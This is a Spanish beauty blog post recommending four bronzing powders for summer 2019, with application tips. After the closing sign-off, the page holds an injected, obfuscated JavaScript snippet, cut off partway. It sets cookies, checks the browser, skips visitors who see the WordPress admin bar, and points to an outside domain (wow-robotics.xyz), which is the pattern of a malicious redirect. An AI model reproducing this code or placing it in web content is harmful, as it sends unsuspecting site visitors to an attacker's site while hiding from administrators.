Cuando tomamos el sol de forma correcta lucimos un color de piel tan sano como favorecedor, pero por desgracia no siempre tenemos la oportunidad de pasar unas horas bajo el sol o bien hemos conseguido un buen tono y tememos perderlo. La solución a este problema son los polvos bronceadores, el producto perfecto para potenciar el moreno o para fingirlo de la forma más natural posible. En el artículo de hoy os damos las claves para utilizarlo de forma correcta y nuestra lista con algunos de los mejores polvos bronceadores para el verano 2019. ¡Empezamos!

vemos una chica mirando a camara sonriendo con la cabeza apoyada en sus piernas esta sentada en un sofa color claro ella tiene la piel bronceada y el pelo castaño los ojos marrones los labios rosa claro

Cómo utilizar de forma correcta los polvos bronceadores

Antes de empezar a hablar de cuáles son los mejores bronceadores, según nuestra opinión, del verano 2019, toca explicar cómo utilizarlos. A muchas de nosotras se nos va la mano con la brocha y la cosa termina con nuestros conocidos preguntado si es que vamos a una fiesta de disfraces. Para evitar este y otros errores comunes al utilizar los polvos bronceadores os dejamos los siguientes consejos:

  1. Elegir siempre un tono similar al de tu piel y si deseas intensificarlo aplica más cantidad de producto. Es decir, no irnos a por los tonos más oscuros ¡eso es mal!
  2. Aplicar el producto sobre las zonas que de forma de natural cogen más color cuando tomamos el sol como la frente, nariz, mejillas y mentón para un efecto stripping.
  3. Si lo que buscamos es un contouring, haremos un tres empezando por la sien hacia las mejillas y, por último, la barbilla.
  4. Otra forma de utilizarlo es sobre todo el rostro, pero ¡cuidado! No queremos que se cargue el look, para ello lo distribuiremos creando círculos e incidiendo solo un poco más en las zonas de la frente, la nariz y la barbilla.

Lista con nuestros bronceadores favoritos del verano

Ahora sí que sí os dejamos la lista con los polvos bronceadores que más nos han entusiasmado este verano 2019 porque de forma rápida y sin mucho conocimiento ayudan a conseguir ese efecto piel besada por el sol que tanto nos gusta.

1.- Bronzing Compact de Clarins

Su bonito packaging ha sido lo primero que nos ha enamorado y menuda alegría nos hemos llevado al comprobar que el contenido cumple su objetivo con nota. Los polvos Bronzing Compact de Clarins tienen una duración en la piel muy buena a pesar del calor y la sudoración algo que se agradece mucho si no queremos llegar al final del día con el rostro derretido. Solo por eso ¡merece estar en la lista!

polvos compacto bronceadores para la cara de color marron oscuro vienen en la clasica cajita redonda con espejo

2.- DIORSKIN MINERAL NUDE BRONZE de DIOR.

La edición limitada DIORSKIN MINERAL NUDE BRONZE de DIOR se ha convertido en un must del verano, un producto que nos ha enamorado porque consigue arrancar el ansiado “qué buena cara tienes hoy” a más de uno y una. Cuando lo tienes en las manos notarás como se han cuidado mucho los detalles del diseño -¡las letras en relieve son una preciosidad!- y cuando lo usas sorprende lo bien que se aplica y el efecto tan natural que deja.

polvos bronceadores en su

3.- Terracotta Contour & Glow de Guerlain

En nuestra lista de los polvos bronceadores que os queríamos recomendar no puede faltar uno que destaque por su versatilidad. En la paleta Terracota Contour & Glow de Guerlain tienes un bronceador, colorete, iluminador y contouring para cubrir todo lo que buscamos resaltar en verano. ¿Increible? ¿Posible? ¿Funciona? Pruébalo y hablamos ¡nosotras estamos in love!

paleta con polvos para la cara en color marron rosa y color carne la tapa es dorada

4.- DUO BRONZE ET LUMIÈRE de CHANEL

Qué podemos decir de una de nuestras marcas predilectas, favoritas, deseadas… pues solo podemos decir que otra vez ha dado en el clavo. El DUO BRONZE ET LUMIÈRE de CHANEL es una edición limitada que combina a la perfección los polvos mate y un iluminador para realzar los contornos. Además, cuando aplicamos la brocha sobre él vemos de qué forma tan sutil se cubre con la cantidad justa y lo bien que se difumina en la piel.

polvos bronceadores de chanel en un recipiente del clasico color negro de la marca los polvos estan divididos en dos uno con un tono marron claro el otro marron mas oscuro

Esta ha sido nuestra recomendación de polvos bronceadores para el verano, ahora os toca a vosotras decirnos si os ha gustado, si los habéis probado, si tenéis otras recomendaciones, etc. Nos encanta leeros en comentarios o en redes sociales, ya sabéis que siempre estamos disponibles. ¡Hasta la próxima! var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone